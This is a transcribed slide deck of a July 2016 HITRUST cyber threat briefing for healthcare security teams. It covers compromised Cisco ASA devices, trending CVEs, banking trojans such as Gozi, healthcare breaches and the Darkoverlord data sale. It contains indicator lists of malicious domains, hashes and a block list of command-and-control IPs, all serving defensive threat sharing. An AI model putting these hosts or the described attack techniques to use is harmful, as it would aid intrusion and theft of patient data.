Monthly Cyber Threat Briefing July 2016
Transcription
Monthly Cyber Threat Briefing July 2016
Monthly Cyber Threat Briefing July 2016 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 1 © 2016 HITRUST Alliance. All Rights Reserved. Presenters • US-CERT: Majed Oweis, CISCP Analyst • Armor: Charity Willhoite, Intelligence Analyst • Trend Micro: Steve Duncan, Product Management • Anomali: Matthew Wollenweber, Sr. Research Engineer • HITRUST: Talha Hasan, Jr. Information Security Analyst 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 2 © 2016 HITRUST Alliance. All Rights Reserved. NCCIC/US-CERT REPORT 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 3 © 2016 HITRUST Alliance. All Rights Reserved. TLP: GREEN – AR-16-20150 – Network Analysis Report (AR) on Compromised Cisco ASA Devices • Analysis conducted by DHS US-CERT Network and Einstein Analytics Team. • Suspected that malicious actors leveraged vulnerabilities cited in CVE-2014-3393 to inject malicious code into affected appliances. • Affected Cisco ASA software versions are included in the analysis report. • Analysis included information about JavaScript code found in the copyright panel of affected devices. Purpose of the code appears to be for credential harvesting. • Same code, with different name, seen on Github. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 4 © 2016 HITRUST Alliance. All Rights Reserved. TLP: GREEN – AR-16-20150 – Network Analysis Report on Compromised Cisco ASA Devices (continued) • Similar activity redirecting to https[:]//www[.]dreamscap[.]com/jquery.js. • Code at “dreamscap” appeared to be similar to code found on Github. • Both included an object called “x” with values for name, version and author. • Object “x” at “dreamscap” site had the author value deleted. Comments about the code were also absent. The “dreamscap” site also included a URL to another resource, logon.php. • Recommended mitigations and references describing the vulnerability are included in the AR. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 5 © 2016 HITRUST Alliance. All Rights Reserved. Report location: • TLP: GREEN – AR-16-20150 – https://portal.us-cert.gov/documents/70338/108826/ AR-16-20150/1619fa49-08d3-4c49-b6ea-17fb2e9d35ce Other resources: • https://tools.cisco.com/security/center/viewAlert.x?alertId=35917 • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3393 • https://www.cvedetails.com/cve/CVE-2014-3393/ • https://www.iad.gov/iad/library/ia-advisories-alerts/recommendationsto-mitigate-unauthorized-cisco-rommon-access-and-validate-bootroms.cfm 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 6 © 2016 HITRUST Alliance. All Rights Reserved. Questions? Comments? Contact US-CERT at: • Email: soc@us-cert.gov • Phone: 1-888-282-0870 • Website: www.us-cert.gov Contact CISCP at: CISCP@us-cert.gov 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 7 © 2016 HITRUST Alliance. All Rights Reserved. Top Threat Trends and Defenses ARMOR 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 8 © 2016 HITRUST Alliance. All Rights Reserved. Trending Vulnerabilities NAME RISK SCORE FIRST SEEN RELATED TECH CVE-2016-0189 7.6/10.0 Critical 6/9/16 The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products CVE-2015-8651 9.3/10.0 High 12/2/15 Adobe Flash Player, Adobe, Angler Exploit Kit, Neutrino Exploit Kit, Antiy Labs CVE-2016-2208 9.4/10.0 Critical 5/19/16 Symantec AV Engine 20151.1.1.4 SRSsoft N/A 5/16 SRS EHR (all versions) – all clients exploitable PilotFish Technologies N/A 7/16 PilotFish EHR integration – all clients exploitable Action Items: • Effectively and immediately patch vulnerabilities according to vendor and NIST recommendations: https://web.nvd.nist.gov • Practices using SRSsoft HER software should disable access from remote support accounts to their networks. RDP access from the internet should be disabled. Replace with an alternative solution until a patch is released. • PilotFish EHR integration clients should activate incident response teams and contact PilotFish immediately. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 9 © 2016 HITRUST Alliance. All Rights Reserved. Additional Details – CVE-2016-0189 EK IOCs Locky Affid 13 : Malware hash 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565dd ee0cad4e249ce18 Sundown EK: Hash61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d 0dc1a65f7de812a3a1 IP - 185.93.185.224 Domain - vicolavicolom.com 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 10 © 2016 HITRUST Alliance. All Rights Reserved. Top Emerging Malware NAME Category RELATED TECH, Industries, Indicators Conficker Botnet, Worm, Trojan, Ransomware MS Windows, XP, Windows 7 Tinba aka Tiny Banker or Zusy Trojan, Virus, Web-inject MS Windows, banking websites, banking apps, Gamarue bot Sality Virus MS Windows Action Items: • Preserve your data: Frequent data backups! • Security Awareness: Do not download untrusted apps on mobile devices, update Windows often! 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 11 © 2016 HITRUST Alliance. All Rights Reserved. Top US Healthcare Targets: June – July 2016 Name of Entity Individuals Affected Breach Submission Date Type of Breach Location of Breached Information Laser & Dermatologic Surgery Center 31,000 6/14/2016 Hacking/IT Incident Network Server Uncommon Care, P.A. 13,674 6/21/2016 Hacking/IT Incident Network Server Grace Primary Care, PC 6,853 6/7/2016 Hacking/IT Incident Network Server Allergy, Asthma & Immunology of the Rockies, PC 6,851 6/17/2016 Hacking/IT Incident Network Server Massachusetts General Hospital 4,293 6/29/2016 Hacking/IT Incident Network Server The Vein Doctor 3,000 6/3/2016 Hacking/IT Incident Electronic Medical Record, Network Server My Pediatrician, PA 2,500 6/1/2016 Hacking/IT Incident Network Server Vincent Vein Center 2,250 6/7/2016 Hacking/IT Incident Electronic Medical Record Blaine Chiropractic Center 1,945 7/14/2016 Hacking/IT Incident Network Server Health Incent, LLC 1,100 7/11/2016 Hacking/IT Incident Other 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 12 © 2016 HITRUST Alliance. All Rights Reserved. Emerging Threats: IP Block List IP Address Risk Score Malware 185.106.122.38 99% Ransomware C&C IP 51.255.172.55 96% Ransomware C&C IP 199.59.243.120 94% C&C IP Botnet 141.8.224.93 93% C&C IP Zeus Botnet C2 185.146.169.16 93% Ransomware C&C IP 5.187.0.137 93% Ransomware C&C IP 54.72.130.67 93% C&C IP 62.149.128.154 93% C&C IP Spamming, Phishing, DDoS 75.99.13.124 93% C&C IP Dridex Botnet C2 100.7.41.35 92% Malware C&C IP DarkComet C2, Malware 107.23.198.240 92% C&C IP 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 13 Behavior Observed Locky C2 IP, Neutrino EK © 2016 HITRUST Alliance. All Rights Reserved. The Value of Records: The Darkoverlord case study TREND MICRO 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 14 © 2016 HITRUST Alliance. All Rights Reserved. Background • Zero-day exploit in Remote Desktop Protocol – Only specific to some orgs using RDP • Extortion mails to affected orgs went unanswered • Darkoverlord turned to TheRealDeal marketplace to sell records 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 15 © 2016 HITRUST Alliance. All Rights Reserved. Records Compromised • 689,621 patient records – Separate databases • Farmingham Misouri MS Access database: 48,000 patients • Atlanta, Georgia internal network: 397k medical records • Central/Midwest misconfigured network: 210k records – Full Data: full names with full addresses, social security, DOB, phone, gender, insurance ID – 151 to 643 BTC ($96k to $411k) • Another possible 9.3 million records – 750 BTC ($478k) 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 16 © 2016 HITRUST Alliance. All Rights Reserved. So what is the value? • Privacy Rights Clearinghouse data survey – Medical records: $82.90 – Social security: $55.70 – Payment details: $45.10 – Physical location information: $38.40 – Marital status: $6.10 – Name and gender: $2.90 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 17 © 2016 HITRUST Alliance. All Rights Reserved. Where will it end up? • Bitglass experiment phase I – 1,500 fake records with secret watermark put on market – In 12 days: • 1,100 clicks, 47 downloads • Data shared in 22 countries, 5 continents • 2 Cybercrime syndicates from Russia and Nigeria • Bitglass Phase II – Fake credentials – In 24 hours • 5 Bank logins • 3 online storage break-ins • 94% uncovered other accounts 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 18 © 2016 HITRUST Alliance. All Rights Reserved. Why? • Persistence of data forms • Mischief in the victim’s name: – Opening new lines of credit – Phony tax claims – Etc.,. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 19 © 2016 HITRUST Alliance. All Rights Reserved. Requirementstoaddresstheproblem Detection: identify and block spear-phishing emails that are often part of the initial phase of a targeted attack or ransomware campaign Interoperability: work seamlessly with an existing spam filter or secure email gateway to detect email spear-phishing attacks that may contain advanced malware including ransomware ROI: low cost of acquisition and tangible benefits from avoidance of costs and risks of targeted and ransomware attacks. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 20 © 2016 HITRUST Alliance. All Rights Reserved. GOZI DETECTED VIA CTX ANOMALI 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 21 © 2016 HITRUST Alliance. All Rights Reserved. Overview: • On June 8th 2016, HITRUST CTX partners began automatically reporting domains associated with Gozi o What is the CTX o What is Gozi 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 22 © 2016 HITRUST Alliance. All Rights Reserved. Anomali_trend Connector + HITRUST CTX 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 23 © 2016 HITRUST Alliance. All Rights Reserved. Gozi Domain: magasoldator[.]ru This known Gozi/URSNIF/IBSF domain was observed and reported via the HITRUST CTX 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 24 © 2016 HITRUST Alliance. All Rights Reserved. What is Gozi ISFB? • Gozi (also called URSNIF and ISFB) is a banking trojan that was first reported circa 2008 • Commonly dropped via Pony but is known to also spread via phishing • Blocks AV products and Microsoft updates • Injects into common browsers to collect banking information • Exfiltrates data using long random looking URLs that are often labeled as images • This variant uses fast-flux techniques • Source code leaked leaked in April 2016 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 25 © 2016 HITRUST Alliance. All Rights Reserved. Participating in HITRUST • https://hitrustalliance.net/ctx-registration/ 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 26 © 2016 HITRUST Alliance. All Rights Reserved. Strategies for Mitigating Gozi • Endpoint AV • Network protection: URL filtering and Email sandboxing • Detection via correlating with threat intelligence sent to IDS, NGFW, or SIEM • Detecting file mismatch (Gozi urls look to be images but aren’t) • High entropy in URL strings (will be noisy) 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 27 © 2016 HITRUST Alliance. All Rights Reserved. For More Information Name Email Ma#hewWollenweber mjw@anomali.com AnomaliSupport/InfoRequests support@anomali.com 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 28 © 2016 HITRUST Alliance. All Rights Reserved. Useful Links • https://hitrustalliance.net/documents/cyber_intel/CTX/HiTrustCTXROIPresentation.pdf • https://hitrustalliance.net/hitrust-pilot-advances-health-industry-cyber-threat-sharing-combat-ransomware-cyberattacks • https://github.com/gbrindisi/malware • https://ui.threatstream.com/search?status=active&value__re=.*ursnif.* • https://ui.threatstream.com/search?status=active&value__re=.*magasoldator.ru.* • https://ui.threatstream.com/search?status=active&value__re=.*ISFB.* • https://api.threatstream.com/api/v1/myattacks/ • http://www.threatgeek.com/2016/06/new-ursnif-variant-targeting-italy-and-us.html • https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/ • https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature • https://www.secureworks.com/research/gozi • https://www.secureworks.com/research/banking-botnets-the-battle-continues 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 29 © 2016 HITRUST Alliance. All Rights Reserved. Indicators Associated with this Botnet • magasoldator[.]ru • bangoteensdab[.]ru • germandartisor[.]ru • 868801075c90864b6dbb54c661fe690d9e1d130e • gashikbarango[.]ru • f59528d8cf4090cf3e2d634059f0ff03a1e10e52 • beeengootrator[.]ru • 175a7e9d34c625da059d8505a6c51ccb • ebankistragira[.]ru • magamedpatygoose[.]ru • majahedislampork[.]ru • maxidorkivast[.]ru • 6af7e41e10ef6a7e075cb82d844810377b9fbb08 • 868801075c90864b6dbb54c661fe690d9e1d130e • 329b50acf49900b51e7870ae27eb458c2cb9e00b 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 30 © 2016 HITRUST Alliance. All Rights Reserved. Threat Correlation to CSF HITRUST 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 31 © 2016 HITRUST Alliance. All Rights Reserved. CSF Controls Related to Threats CSF Control for Vulnerability Patching • Control Reference: *10.m Control of technical vulnerabilities – Control Text: Timely information about technical vulnerabilities of systems being used shall be obtained; the organization's exposure to such vulnerabilities evaluated; and appropriate measures taken to address the associated risk – Implementation Requirement: Specific information needed to support technical vulnerability management includes the software vendor, version numbers, current state of deployment (e.g. what software is installed on what systems) and the person(s) within Appropriate, timely action shall be taken in response to the identification of potential technical vulnerabilities. Once a potential technical vulnerability has been identified, the organization shall identify the associated risks and the actions to be taken. Such action shall involve patching of vulnerable systems and/or applying other controls. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 32 © 2016 HITRUST Alliance. All Rights Reserved. CSF Controls Related to Threats CSF Control for Emerging Threats/IP Blocklist • Control Reference: 01.i Policy on the Use of Network Services – Control Text: Users shall only be provided access to internal and external network services that they have been specifically authorized to use. Authentication and authorization mechanisms shall be applied to users and equipment. – Implementation Requirement: The organization shall specify the networks and network services to which users are authorized access. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 33 © 2016 HITRUST Alliance. All Rights Reserved. CSF Controls Related to Threats CSF Control for top emerging malware • Control Reference: 09.j Controls Against Malicious Code – Control Text: Detection, prevention, and recovery controls shall be implemented to protect against malicious code, and appropriate user awareness procedures on malicious code shall be provided. – Implementation Requirement: Protection against malicious code shall be based on malicious code detection and repair software, security awareness, and appropriate system access and change management controls. 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 34 © 2016 HITRUST Alliance. All Rights Reserved. QUESTIONS? 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 35 © 2016 HITRUST Alliance. All Rights Reserved. Visit www.HITRUSTAlliance.net for more information To view our latest documents, visit the Content Spotlight 855.HITRUST (855.448.7878) www.HITRUSTAlliance.net 36 © 2016 HITRUST Alliance. All Rights Reserved.
Similar documents
HITRUST Monthly Briefing May 2016
unusual or unauthorized activities or conditions. 855.HITRUST
More information